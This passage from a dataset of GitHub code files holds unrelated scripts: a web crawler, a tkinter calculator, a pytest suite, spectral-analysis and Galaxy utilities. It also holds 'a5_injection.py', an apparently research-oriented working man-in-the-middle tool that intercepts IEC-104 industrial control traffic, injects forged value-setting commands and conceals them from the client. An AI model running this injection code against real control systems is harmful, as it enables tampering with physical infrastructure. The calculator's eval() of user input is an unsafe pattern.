url_list_map.setdefault(url_id_map.__getitem__(cur), pages)\n # context\n doc = open(os.path.join('data_dir', str(addr) + '.info'), 'w', encoding='utf-8')\n data = soup.select('head')\n for item in data:\n text = re.sub('[\\r \\n\\t]', '', item.get_text())\n if text == None or text == '':\n continue\n doc.write(text)\n data = soup.select('body')\n for item in data:\n text = re.sub('[\\r \\n\\t]', '', item.get_text())\n if text == None or text == '':\n continue\n doc.write(text)\n doc.close()\n\nif __name__ == \"__main__\":\n url_anc = open(os.path.join('spider', 'url_anc.txt'), 'w', encoding='utf-8')\n doc_url = open(os.path.join('spider', 'doc_url.txt'), 'w', encoding='utf-8')\n while max_loop > 0 or len(nxt) > 0:\n # fetch\n html = get_html(cur)\n if html == None:\n print(\"xxx fetch \", cur, \" failed, drop\")\n while True:\n cur = nxt[0]\n nxt.remove(cur)\n if re.search(\"nankai\", cur) == None:\n continue\n if not re.search(\"\\.cn|\\.com\", cur) == None:\n break\n continue\n real_url = html.url\n if re.search('nankai', real_url) == None:\n print(\"xxx wrong url \", real_url, \", drop\")\n while True:\n cur = nxt[0]\n nxt.remove(cur)\n if re.search(\"nankai\", cur) == None:\n continue\n if not re.search(\"\\.cn|\\.com\", cur) == None:\n break\n continue\n # write\n if not re.search('\\.doc|\\.docx|\\.zip|\\.rar|\\.ppt|\\.pptx|\\.xlsx|\\.xls|\\.jpg|\\.png|\\.pdf|\\.md', real_url) == None \\\n or re.search('file|download', real_url) != None:\n anc = url_anc_map.get(cur)\n if anc != None:\n print(\"+++ document \", real_url)\n if doc_id_map.__have__(real_url) == None:\n docid = doc_id_map.__getitem__(real_url)\n doc_url.write(anc + \" \" + str(docid) + \"\\n\")\n else:\n # add cur url\n if url_id_map.__have__(cur) == None:\n url_id_map.__getitem__(cur)\n write_result(html)\n tot = tot + 1\n print('@', tot, ' ', cur, ': ', 
len(nxt))\n while True:\n cur = nxt[0]\n nxt.remove(cur)\n if re.search(\"nankai\", cur) == None:\n continue\n if not re.search(\"\\.cn|\\.com\", cur) == None:\n break\n base_url = cur[:re.search(\"\\.cn|\\.com\", cur).span()[1]]\n if max_loop > 0:\n max_loop = max_loop - 1\n if tot == 20000:\n break\n doc_url.close()\n url_anc.close()\n # save pages link\n # print(url_list_map)\n doc = open(os.path.join('data_out', 'url_list.dict'), 'wb')\n pkl.dump(url_list_map, doc)\n doc.close()\n doc = open(os.path.join('data_out', 'url_id.dict'), 'wb')\n pkl.dump(url_id_map, doc)\n doc.close()\n doc = open(os.path.join('data_out', 'doc_id.dict'), 'wb')\n pkl.dump(doc_id_map, doc)\n doc.close()\n # print(url_list_map)\n print(\"FINISH\")","repo_name":"Emanual20/IR-hw6-Web-Search-Engine","sub_path":"spideryy.py","file_name":"spideryy.py","file_ext":"py","file_size_in_byte":5373,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"71641177102","text":"#!/usr/bin/env python\n\n# Lightly modified from: https://www.simplifiedpython.net/python-calculator/ with\n# the help of the pyright LSP server. The Arch system Python had had tkinter module\n# but the tk and tcl Pacman packages also needed to be installed.\n\nimport tkinter\n\nYES = tkinter.YES\nBOTH = tkinter.BOTH\nLEFT = tkinter.LEFT\nTOP = tkinter.TOP\nRIDGE = tkinter.RIDGE\n\nFrame = tkinter.Frame\nButton = tkinter.Button\nStringVar = tkinter.StringVar\nEntry = tkinter.Entry\n \ndef iCalc(source, side):\n storeObj = Frame(source, borderwidth=4, bd=4, bg=\"powder blue\")\n storeObj.pack(side=side, expand = YES, fill = BOTH)\n return storeObj\n \ndef button(source, side, text, command):\n storeObj = Button(source, text=text, command=command)\n storeObj.pack(side=side, expand = YES, fill= BOTH)\n return storeObj\n \nclass app(Frame):\n def __init__(self):\n Frame.__init__(self)\n self.option_add('*Font', 'arial 20 bold')\n self.pack(expand = YES, fill = BOTH)\n \n display = StringVar()\n Entry(self, relief=RIDGE, textvariable=display, justify='right',\n bd=30, bg=\"powder blue\").pack(side=TOP, expand=YES, fill = BOTH)\n \n for clearButton in ([\"C\"]):\n erase = iCalc(self, TOP)\n for ichar in clearButton:\n button(erase, LEFT, ichar, lambda storeObj=display, _=ichar: storeObj.set(''))\n \n for numButton in (\"789/\", \"456*\", \"123-\", \"0.+\"):\n FunctionNum = iCalc(self, TOP)\n for iEquals in numButton:\n button(FunctionNum, LEFT, iEquals,\n lambda storeObj=display, q=iEquals: storeObj.set(storeObj.get() + q))\n \n EqualButton = iCalc(self, TOP)\n for iEquals in \"=\":\n if iEquals == '=':\n btniEquals = button(EqualButton, LEFT, iEquals, None)\n btniEquals.bind('',\n lambda _,s=self, storeObj=display: s.calc(storeObj),\n '+')\n else:\n btniEquals = button(EqualButton, LEFT, iEquals,\n lambda storeObj=display, s=' %s ' % iEquals:\n storeObj.set(storeObj.get() + s))\n \n def calc(self, display):\n try:\n display.set(eval(display.get()))\n except:\n display.set(\"ERROR\")\n\nif __name__=='__main__':\n app().mainloop()\n","repo_name":"grscheller/scheller-linux-archive","sub_path":"grok/Python/calculator/simpleTkCalc.py","file_name":"simpleTkCalc.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"30267980680","text":"#!/usr/bin/python3\ndef max_integer(my_list=[]):\n \"\"\"Find the biggest integer of a list.\"\"\"\n # Check if the list is empty\n if len(my_list) == 0:\n # Return None if the 
list is empty\n        return None\n    \n    # Initialize the maximum value to the first element of the list\n    max_value = my_list[0]\n    \n    # Iterate over the remaining elements of the list\n    for num in my_list[1:]:\n        # Compare each element with the current maximum value\n        if num > max_value:\n            # If the current element is greater, update the maximum value\n            max_value = num\n    \n    # Return the maximum value\n    return max_value\n","repo_name":"Sentense1/alx-higher_level_programming","sub_path":"0x03-python-data_structures/9-max_integer.py","file_name":"9-max_integer.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"15443969113","text":"\nimport pytest\nimport task_18_2b\nimport sys\n\nsys.path.append(\"..\")\n\nfrom pyneng_common_functions import check_function_exists\n\n\ncorrect_return_value = (\n    {\n        \"ip http server\": \"config term\\n\"\n        \"Enter configuration commands, one per line. End with CNTL/Z.\\n\"\n        \"R1(config)#ip http server\\n\"\n        \"R1(config)#\",\n        \"logging buffered 20010\": \"config term\\n\"\n        \"Enter configuration commands, one per line. End with CNTL/Z.\\n\"\n        \"R1(config)#logging buffered 20010\\n\"\n        \"R1(config)#\",\n    },\n    {\n        \"a\": \"config term\\n\"\n        \"Enter configuration commands, one per line. End with CNTL/Z.\\n\"\n        \"R1(config)#a\\n\"\n        '% Ambiguous command: \"a\"\\n'\n        \"R1(config)#\",\n        \"logging\": \"config term\\n\"\n        \"Enter configuration commands, one per line. End with CNTL/Z.\\n\"\n        \"R1(config)#logging\\n\"\n        \"% Incomplete command.\\n\"\n        \"\\n\"\n        \"R1(config)#\",\n        \"logging 0255.255.1\": \"config term\\n\"\n        \"Enter configuration commands, one per line. End with CNTL/Z.\\n\"\n        \"R1(config)#logging 0255.255.1\\n\"\n        \" ^\\n\"\n        \"% Invalid input detected at '^' marker.\\n\"\n        \"\\n\"\n        \"R1(config)#\",\n    },\n)\n\n\ndef test_functions_created():\n    \"\"\"\n    Test that the function has been created\n    \"\"\"\n    check_function_exists(task_18_2b, \"send_config_commands\")\n\n\ndef test_function_return_value(capsys, first_router_from_devices_yaml):\n    \"\"\"\n    Check that the function works correctly\n    \"\"\"\n    commands_with_errors = [\"logging 0255.255.1\", \"logging\", \"a\"]\n    correct_commands = [\"logging buffered 20010\", \"ip http server\"]\n    test_commands = commands_with_errors + correct_commands\n\n    return_value = task_18_2b.send_config_commands(\n        first_router_from_devices_yaml, test_commands, log=False\n    )\n\n    # check the return value\n    assert return_value != None, \"The function returns nothing\"\n    assert type(return_value) == tuple, \"The function must return a tuple\"\n    assert 2 == len(return_value) and all(\n        type(item) == dict for item in return_value\n    ), \"The function must return a tuple with two dictionaries\"\n    correct_good, correct_bad = correct_return_value\n    return_good, return_bad = return_value\n    assert (\n        correct_good.keys() == return_good.keys()\n    ), \"The function returns a wrong value for the dictionary with error-free commands\"\n    assert (\n        correct_bad.keys() == return_bad.keys()\n    ), \"The function returns a wrong value for the dictionary with commands that have errors\"\n\n\n
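# Descriptive note (added): each (error, command) pair below drives one run of\n# test_function_stdout with a single malformed command and the error text it\n# is expected to print.\n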
@pytest.mark.parametrize(\n    \"error,command\",\n    [\n        (\"Invalid input detected\", \"logging 0255.255.1\"),\n        (\"Incomplete command\", \"logging\"),\n        (\"Ambiguous command\", \"a\"),\n    ],\n)\ndef test_function_stdout(error, command, capsys, first_router_from_devices_yaml):\n    return_value = task_18_2b.send_config_commands(\n        first_router_from_devices_yaml, [command], log=False\n    )\n\n    stdout, err = capsys.readouterr()\n    ip = first_router_from_devices_yaml[\"host\"]\n    assert error in stdout, \"The error message does not contain the error itself\"\n    assert command in stdout, \"The error message does not contain the executed command\"\n    assert ip in stdout, \"The error message does not contain the device IP address\"\n","repo_name":"AndyMiga/PyNEngUkr_2023_My_Tasks","sub_path":"exercises/18_ssh_telnet/test_task_18_2b.py","file_name":"test_task_18_2b.py","file_ext":"py","file_size_in_byte":3687,"program_lang":"python","lang":"uk","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"13398156719","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 7 22:52:59 2021\n\n@author: grogroda\n\"\"\"\n\nimport NetworkGeneration as ng\nfrom matplotlib import pyplot as plt\nimport time\nimport numpy as np\nfrom scipy.optimize import curve_fit\nimport multiprocessing as mp\n\n'''\nThis code will be used to test and analyse data from the TN_model_generate function\nof the NetworkGeneration.py module. This version of the code uses a module called\nmultiprocessing, which I'm using here purely to make the code run faster. As\nyou will notice, both codes work, but since I wanted to simulate very big networks\na huge number of times, I needed to adapt the code to run it in a cluster, that's\nwhy I'm making a separate code here in case you want to work with a more efficient\nversion of the analysis code.\n'''\n\ndef simular(n, alpha_A, alpha_G, N):\n    '''\n    This will create n networks with the TN_model, using the parameters shown,\n    and print the graph of p(e) x e where p(e) is the probability to find a node \n    with energy e in the final network.\n    '''\n    \n    cores=mp.cpu_count()\n    pool=mp.Pool(processes=cores)\n    energies=[]\n    pool_list=[]\n    \n    for i in range(n):\n        p=pool.apply_async(ng.TN_model_generate, (alpha_A, alpha_G, N))\n        pool_list.append(p)\n        #print('Simulation', 100*len(pool_list)/n, '% completed!')\n    \n    networks=[p.get() for p in pool_list]\n    \n    for nk in networks:\n        energies+=[node.weight for node in nk.nodes]\n    \n    return energies\n\ndef analisar(energy_list, bins, q_fit=False): \n    \n    # REVIEW AND FIX THIS PART OF THE CODE!\n    \n    start, finish=min(energy_list), max(energy_list)\n    bins_list=list(np.logspace(np.log10(start), np.log10(finish), num=bins))\n    hist, edges=np.histogram(energy_list, bins=bins_list, density=True)\n    hist_list=list(hist)\n    hist_list.append(1/len(energy_list))\n    \n    if q_fit==True:\n        \n        def q_dist(x, q, bq, Z):\n            \n            return 1/Z*(1-bq*(1-q)*x)**(1/(1-q))\n        \n        parameters, cov_matrix=curve_fit(q_dist, bins_list, hist_list)\n        q=parameters[0]\n        bq=parameters[1]\n        Z=parameters[2]\n        \n    print(len(bins_list), len(hist_list))\n    plt.scatter(bins_list, hist_list, c='k')\n    if q_fit==True:\n        plt.plot(bins_list, [1/Z*(1-bq*(1-q)*x)**(1/(1-q)) for x in bins_list])\n        print('Z=', Z, ', q=', q, ' & \u03B2=', bq)\n        print('Covariance Matrix:')\n        print(cov_matrix)\n    \n    plt.xlim((0.000005, 50))\n    plt.ylim((0.000008, 10))\n    plt.xscale('log')\n    plt.yscale('log')\n    plt.xlabel('\u03B5')\n    plt.ylabel('P(\u03B5)')\n    plt.show()\n    \nif __name__=='__main__':\n    t0=time.time()\n    energies=simular(100, 2, 1, 1000)\n    analisar(energies, 100, q_fit=False)\n    print('Execution time:', time.time()-t0)","repo_name":"kiq316/Fractal-Systems-Project","sub_path":"Codes/TN_analyseMP.py","file_name":"TN_analyseMP.py","file_ext":"py","file_size_in_byte":2829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} 
+{"seq_id":"71541276624","text":"import netfilterqueue\nimport typer\nfrom netfilterqueue import NetfilterQueue\nfrom kamene.layers.inet import *\nfrom kamene.all import *\nimport warnings\nimport threading\nfrom utils.utils import *\n\nwarnings.simplefilter(\"ignore\")\n\n\nclass IEC104MITM:\n def __init__(self, client_ip: str, server_ip: str, server_port: int):\n self.client_ip = client_ip\n self.server_ip = server_ip\n self.server_port = server_port\n self.client_port = None\n\n self.injected_packet_sent = False\n self.original_ioa_values = {}\n self.faked_ioa_values = {}\n\n self.tcp_offset = 0\n self.iec_offset = 0\n\n self.client_tcp_seq_next, self.client_tcp_ack, self.client_iec_tx, self.client_iec_rx = None, None, None, None\n\n def extract_tcp_and_iec_values(self, packet: IP) -> (int, int, int, int, int):\n tcp_seq, tcp_seq_next, tcp_ack = extract_tcp_details(packet)\n iec_tx, iec_rx = None, None\n if extract_iec_details(packet) is not None:\n iec_tx, iec_rx = extract_iec_details(packet)\n if packet['IP'].src == self.client_ip:\n self.client_port = packet['TCP'].sport\n self.client_tcp_seq_next = tcp_seq_next\n self.client_tcp_ack = tcp_ack\n if iec_tx is not None and iec_rx is not None:\n self.client_iec_tx = iec_tx\n self.client_iec_rx = iec_rx\n\n if extract_ioa_values(packet) is not None:\n ioa, value = extract_ioa_values(packet)\n self.original_ioa_values[ioa] = value\n return tcp_seq, tcp_ack, iec_tx, iec_rx\n\n def update_and_send(self, packet: IP, tcp_seq: int, tcp_ack: int, iec_tx: int, iec_rx: int):\n if packet['IP'].src == self.client_ip:\n tcp_seq, tcp_ack = tcp_seq + self.tcp_offset, tcp_ack + self.tcp_offset\n if iec_tx is not None and iec_rx is not None:\n iec_tx, iec_rx = iec_tx + self.iec_offset, iec_rx + self.iec_offset\n elif packet['IP'].src == self.server_ip:\n tcp_seq, tcp_ack = tcp_seq - self.tcp_offset, tcp_ack - self.tcp_offset\n if iec_tx is not None and iec_rx is not None:\n iec_tx, iec_rx = iec_tx - self.iec_offset, iec_rx - self.iec_offset\n\n packet = update_tcp_header(packet, tcp_seq, tcp_ack)\n\n if iec_tx is not None and iec_rx is not None:\n packet = update_iec_apci(packet, iec_tx, iec_rx)\n if packet['IP'].src == self.server_ip:\n packet = update_iec_asdu(packet, self.original_ioa_values)\n elif packet['IP'].src == self.client_ip:\n packet = update_iec_asdu(packet, self.faked_ioa_values)\n\n packet = update_checksums(packet)\n send(packet, verbose=False)\n\n def packet_handler(self, packet: netfilterqueue.Packet) -> None:\n smart_packet = IP(packet.get_payload())\n if smart_packet['IP'].src in [self.client_ip, self.server_ip] and \\\n smart_packet['IP'].dst in [self.client_ip, self.server_ip] and \\\n self.server_port in [smart_packet['TCP'].sport, smart_packet['TCP'].dport]:\n if self.injected_packet_sent:\n self.injected_packet_sent = False\n self.forge_ack()\n else:\n tcp_seq, tcp_ack, iec_tx, iec_rx = self.extract_tcp_and_iec_values(smart_packet)\n self.update_and_send(smart_packet, tcp_seq, tcp_ack, iec_tx, iec_rx)\n packet.drop()\n else:\n packet.accept()\n\n def inject_packet(self, ioa, value):\n if None in [self.client_tcp_seq_next, self.client_tcp_ack, self.client_iec_rx, self.client_iec_tx]:\n typer.secho(\"[-] Some values are still None, try again later!\", fg=typer.colors.RED)\n return\n\n self.iec_offset += 1\n tx = self.client_iec_tx + self.iec_offset\n rx = self.client_iec_rx + self.iec_offset\n payload = build_iec_packet(tx, rx, ioa, value)\n\n ip = IP(src=self.client_ip, dst=self.server_ip)\n tcp = TCP(dport=self.server_port, 
sport=self.client_port)\n        tcp.seq = self.client_tcp_seq_next + self.tcp_offset\n        tcp.ack = self.client_tcp_ack\n        tcp.payload = payload\n        tcp.flags = 24\n        tcp.window = 502\n        packet = ip / tcp\n        update_checksums(packet)\n\n        self.tcp_offset += len(payload)\n        self.faked_ioa_values[ioa] = value\n        self.injected_packet_sent = True\n        send(packet, verbose=False)\n\n    def forge_ack(self):\n        ip = IP(src=self.client_ip, dst=self.server_ip)\n        tcp = TCP(dport=self.server_port, sport=self.client_port)\n        tcp.seq = self.client_tcp_seq_next + self.tcp_offset\n        tcp.ack = self.client_tcp_ack + self.tcp_offset\n        tcp.flags = 16\n        tcp.window = 502\n        packet = ip / tcp\n        update_checksums(packet)\n        send(packet, verbose=False)\n\n    def read_command(self):\n        while True:\n            try:\n                command = input(\"Command: \")\n                if len(command.split(\":\")) == 2:\n                    ioa = int(command.split(\":\")[0])\n                    value = int(command.split(\":\")[1])\n                    self.inject_packet(ioa, value)\n            except ValueError:\n                pass\n\n    def start(self, queue_id=1):\n        net_filter_queue = NetfilterQueue()\n        net_filter_queue.bind(queue_id, self.packet_handler)\n        try:\n            net_filter_queue.run()\n        except KeyboardInterrupt:\n            print('')\n\n        net_filter_queue.unbind()\n\n\ndef main(\n        client_ip: str = typer.Argument(..., help=\"IP address of the IEC client\"),\n        server_ip: str = typer.Argument(..., help=\"IP address of the IEC server\"),\n        server_port: int = typer.Option(2404, help=\"TCP port number of the IEC server.\")\n):\n    if not is_ipv4_address(data=client_ip) or not is_ipv4_address(data=server_ip):\n        typer.secho(\"[-] Invalid client/server IP provided.\", fg=typer.colors.RED)\n        exit(1)\n    if not is_tcp_port(data=server_port):\n        typer.secho(\"[-] Invalid server port provided.\", fg=typer.colors.RED)\n        exit(1)\n    try:\n        typer.secho(\"[*] Trying to setup iptables rules.\", fg=typer.colors.YELLOW)\n        setup_iptables(client_ip=client_ip, server_ip=server_ip, server_port=server_port)\n        typer.secho(\"[+] Rules added!\", fg=typer.colors.GREEN)\n    except:\n        typer.secho(\"[-] Something went wrong during rule manipulation!\", fg=typer.colors.RED)\n        exit(1)\n\n    mitm = IEC104MITM(client_ip, server_ip, server_port)\n    thread1 = threading.Thread(target=mitm.start)\n    thread1.daemon = True\n    thread1.start()\n    mitm.read_command()\n\n\nif __name__ == \"__main__\":\n    typer.run(main)\n","repo_name":"CrySyS/IEC-104-Attacks","sub_path":"Attacker/attacks/a5_injection.py","file_name":"a5_injection.py","file_ext":"py","file_size_in_byte":6710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"70514710864","text":"import tkinter as tk\nimport pybaselines as pybase\nimport numpy as np\nimport sif_parser as sif\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nfrom PIL import Image, ImageFile\n\n\nfrom matplotlib.widgets import SpanSelector\nfrom matplotlib.backend_bases import MouseButton\nfrom tkinter import filedialog\n\n\n\n\nxmin = 2000\nxmax = 3900\n\nnormalize_window = [.35, 1]\n\n\n\n
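# Note (added): normalize_window holds fractional bounds into the spectrum, so\n# [.35, 1] rescales a trace by the maximum of its last 65% of samples (see\n# window_max_normalize below).\n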
def get_multi_data():\n    root = tk.Tk()\n    root.withdraw()\n\n    datasource = pd.DataFrame(columns=[\"Capture Info\",\"X Data\",\"Y Data\", \"Modified Y Data\"])\n    datasource['Capture Info'] = datasource['Capture Info'].astype(object)\n    datasource['X Data'] = datasource['X Data'].astype(object)\n    datasource['Y Data'] = datasource['Y Data'].astype(object)\n    datasource['Modified Y Data'] = datasource['Modified Y Data'].astype(object)\n    file_paths = filedialog.askopenfilenames(filetypes=[(\"Sif Files\", \"*.sif\")])\n    for filecount in range(len(file_paths)):\n        tempdata, tempinfo = sif.utils.parse(file_paths[filecount])\n        datasource.loc[filecount] = [tempinfo, tempdata[:, 0], tempdata[:, 1], tempdata[:, 1]]\n    return datasource\n\ndef get_indices(data_x, xmin, xmax):\n    indmax = np.searchsorted(data_x, xmax, side = 'right')\n    indmin = np.searchsorted(data_x, xmin, side = 'left')\n    return indmin, indmax\n\ndef truncate(data, indmin, indmax):\n    return data[indmin:indmax]\n\ndef whole_normalize(data):\n    return np.divide(data, np.sum(data))\n\ndef window_max_normalize(x_data, data_range):\n    indmin = int(data_range[0] * x_data.size)\n    indmax = int(data_range[1] * x_data.size)\n    window = x_data[indmin:indmax]\n    max_val = window.max()\n    return x_data / max_val\n\n\ndef wavelength_to_raman(wavelengths, ExcitationWavelength):\n    return 10_000_000 / ExcitationWavelength - 10_000_000 / wavelengths\n\ndef array_row_intersection(a,b):\n    tmp=np.prod(np.swapaxes(a[:,:,None],1,2)==b,axis=2)\n    return a[np.sum(np.cumsum(tmp,axis=0)*tmp==1,axis=1).astype(bool)]\n\ndef on_key_press(event):\n    global input_key\n    input_key = event.key\n    if input_key == 'enter':\n        plt.close()\n\ndef on_mouse_click(event):\n    global input_click\n    input_click = event.button\n    if input_click is MouseButton.LEFT:\n        ax.set_title(\"Remove Areas of Signal\\n Press Enter to Finish\")\n        fig.canvas.draw_idle()\n    if input_click is MouseButton.RIGHT:\n        ax.set_title(\"Add Areas of Background\\n Press Enter to Finish\")\n        fig.canvas.draw_idle()\n\ndef PolyCoefficients(x, coeffs):\n    o = len(coeffs)\n    y = 0\n    for i in range(o):\n        y += coeffs[i]*x**i\n    return y\n\ndef clippable(array, include_x=True):\n    if include_x:\n        tmp = pd.DataFrame(array)\n    else:\n        tmp = pd.DataFrame(array[:, 1])\n    tmp.to_clipboard(index=False,header=False)\n\ndef onselect(vmin, vmax):\n    if input_click is MouseButton.LEFT:\n        indmin = np.searchsorted(specs.x, vmin, 'left')\n        indmax = np.searchsorted(specs.x, vmax, 'right')\n        try:\n            specs.signal = np.unique(np.vstack((specs.signal, specs.combdata[indmin:indmax+1, :])), axis=0)\n        except ValueError:\n            specs.signal = specs.combdata[indmin:indmax+1]\n        specs.noise = np.array(list(set(map(tuple, specs.noise)).difference(set(map(tuple, specs.combdata[indmin:indmax+1])))))\n        ax.clear()\n        if np.size(specs.signal) > 0:\n            specs.signal = specs.signal[specs.signal[:, 0].argsort()]\n            ax.plot(specs.signal[:,0], specs.signal[:, 1], '.', color='red')\n        if np.size(specs.noise) > 0:\n            specs.noise = specs.noise[specs.noise[:, 0].argsort()]\n            ax.plot(specs.noise[:,0], specs.noise[:, 1], '.', color='blue')\n        ax.set_title(\"Remove Areas of Signal\\n Press Enter to Finish\")\n        fig.canvas.draw_idle()\n    if input_click is MouseButton.RIGHT:\n        indmin = np.searchsorted(specs.x, vmin, 'left')\n        indmax = np.searchsorted(specs.x, vmax, 'right')\n        try:\n            specs.noise = np.unique(np.vstack((specs.noise, specs.combdata[indmin:indmax+1, :])), axis=0)\n        except ValueError:\n            specs.noise = specs.combdata[indmin:indmax+1]\n        specs.signal = np.array(list(set(map(tuple, specs.signal)).difference(set(map(tuple, specs.combdata[indmin:indmax+1])))))\n        ax.clear()\n        if np.size(specs.signal) > 0:\n            specs.signal = specs.signal[specs.signal[:, 0].argsort()]\n            ax.plot(specs.signal[:,0], specs.signal[:, 1], '.', color='red')\n        if np.size(specs.noise) > 0:\n            specs.noise = specs.noise[specs.noise[:, 0].argsort()]\n            ax.plot(specs.noise[:,0], specs.noise[:, 1], '.', color='blue')\n        ax.set_title(\"Add Areas of Background\\n Press Enter to Finish\")\n        fig.canvas.draw_idle()\n\n\nclass Specs:\n    def __init__(self, x_, y_, signal_, noise_, combdata_):\n        self.x = 
x_\n self.y = y_\n self.signal = signal_\n self.noise = noise_\n self.combdata = combdata_\n\n\ndata = get_multi_data()\n\nfor row in data.index:\n data['X Data'][row] = wavelength_to_raman(data['X Data'][row], data['Capture Info'][row]['RamanExWavelength'])\n indmin, indmax = get_indices(data['X Data'][row], xmin, xmax)\n data['X Data'][row] = truncate(data['X Data'][row], indmin, indmax)\n data['Y Data'][row] = truncate(data['Y Data'][row], indmin, indmax)\n\n x = data['X Data'][row]\n y = data['Y Data'][row]\n combdata = np.vstack((x, y))\n combdata = combdata.transpose()\n signal = np.empty([0, 2])\n noise = combdata\n specs = Specs(x, y, signal, noise, combdata)\n \n\n fig, ax = plt.subplots(figsize = (12,8))\n ax.plot(x, y, '.', color='blue')\n ax.plot(signal[:, 0], signal[:, 1], '.', color = 'red')\n ax.set_title(\"Press Shift to Remove Signal Areas, Press + to Add Areas Back \\n Press Enter When Finished\")\n\n input_click = None\n input_key = None\n\n cid = fig.canvas.mpl_connect('key_press_event', on_key_press)\n plt.connect('button_press_event', on_mouse_click)\n span = SpanSelector(ax, onselect, 'horizontal', useblit=True, props=dict(facecolor='blue', alpha=0.25), snap_values = x)\n plt.show()\n fig.canvas.mpl_disconnect(cid)\n\n baseline_fitter = pybase.Baseline(specs.noise[:, 0], assume_sorted = True)\n\n cut_base, params = baseline_fitter.imodpoly(specs.noise[:, 1], poly_order = 3, return_coef = True)\n\n coeffs = params['coef']\n\n baseline_y = np.zeros(np.size(specs.x))\n\n baseline_y = PolyCoefficients(specs.x, coeffs)\n\n corrected_signal = specs.y - baseline_y\n\n # corrected_signal = whole_normalize(corrected_signal)\n corrected_signal = window_max_normalize(corrected_signal, normalize_window)\n\n x = specs.x\n y = specs.y\n noise = specs.noise\n signal = specs.signal\n\n data['Modified Y Data'][row] = corrected_signal\n\n ax.clear()\n\n plt.plot(x, PolyCoefficients(x, coeffs))\n plt.plot(x, y)\n\n fig2 = plt.figure(2)\n plt.plot(x, corrected_signal)\n plt.show()\n\n fig.canvas.mpl_disconnect(cid)\n fig2.canvas.mpl_disconnect(cid)\n corrected_data = (np.vstack((x, corrected_signal))).transpose()\n\naverage_x = data['X Data'][0]\naverage_y = np.empty(0)\n\nfor item in data['Modified Y Data']:\n if not average_y.size:\n average_y = item\n else:\n average_y = np.vstack((average_y, item))\nif average_y.ndim > 1:\n average_y = np.mean(average_y, axis = 0)\naverage_data = np.vstack((average_x, average_y))\n\ninclude_x = input('Include x axis data for clipboard? 
[y/n]: ')\nclippable(average_data.transpose(), include_x.lower() == 'y')\n\nfor row in data.index:\n print(str(data['Capture Info'][row]['OriginalFilename']))\n\nplt.plot(average_data[0, :], average_data[1,:])\nplt.show()\n","repo_name":"dawson-baxter/SpectralSolver","sub_path":"spectralsolver.py","file_name":"spectralsolver.py","file_ext":"py","file_size_in_byte":7660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"21012145230","text":"n = int(input())\narray = []\n\nfor i in range(n):\n\tx, y = input().split()\n\tarray.append((x, int(y)))\n\narray.sort(key = lambda x : x[1])\n\nfor i in array:\n\tprint(i[0], end = ' ')\n\n\n\n\n\n","repo_name":"LeeJin0527/algorithm","sub_path":"이코테/정렬/문제풀이/성적이 낮은 순서로 학생 출력하기.py","file_name":"성적이 낮은 순서로 학생 출력하기.py","file_ext":"py","file_size_in_byte":180,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"33494684187","text":"from galaxy import config, tools, jobs, web\nimport galaxy.model.mapping\n\nclass UniverseApplication( object ):\n \"\"\"Encapsulates the state of a Universe application\"\"\"\n def __init__( self, **kwargs ):\n # Read config file and check for errors\n self.config = config.Configuration( **kwargs )\n self.config.check()\n config.configure_logging( self.config )\n # Connect up the object model\n if self.config.database_connection:\n self.model = galaxy.model.mapping.init( self.config.file_path,\n self.config.database_connection,\n create_tables = True )\n else:\n self.model = galaxy.model.mapping.init( self.config.file_path,\n \"sqlite://%s?isolation_level=IMMEDIATE\" % self.config.database,\n create_tables = True )\n # Initialize the tools\n self.toolbox = tools.ToolBox( self.config.tool_config, self.config.tool_path )\n # Start the job queue\n self.job_queue = jobs.JobQueue( self.config.job_queue_workers, self )\n self.heartbeat = None\n # Start the heartbeat process if configured and available\n if self.config.use_heartbeat:\n from galaxy import heartbeat\n if heartbeat.Heartbeat:\n self.heartbeat = heartbeat.Heartbeat()\n self.heartbeat.start()\n def shutdown( self ):\n self.job_queue.shutdown()\n if self.heartbeat:\n self.heartbeat.shutdown()","repo_name":"jmchilton/galaxy-central","sub_path":"galaxy/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"47"} +{"seq_id":"32678196469","text":"\nimport logging\nfrom datetime import datetime\n\nfrom covis_db import db,hosts,remote,misc\n\ndef add_raw_entry_for_wasabi( args, run ):\n\n if run.datetime < datetime(2018,1,1):\n return True\n\n logging.info(\" Checking for Wasabi raw for basename %s\" % run.basename)\n\n ## Check for raw\n if run.find_raw(\"WASABI\"):\n logging.info(\" Has raw entry for WASABI\")\n return True\n\n if args.fix:\n s3_file = misc.make_pathname( run.basename, suffix=\".tar.gz\" )\n logging.info(\" Checking Wasabi for %s\" % s3_file)\n\n try:\n accessor = remote.WasabiAccessor( path=s3_file )\n\n filesize = accessor.filesize()\n logging.info(\" File %s on wasabi is %d\" % (run.basename, filesize) )\n\n if not run.add_raw(\"WASABI\", s3_file, filesize=filesize, suffix=\".tar.gz\"):\n logging.info(\" Unable to add raw\")\n\n logging.info(\" ... done adding\")\n except Exception as ex:\n template = \"An exception of type {0} occurred. 
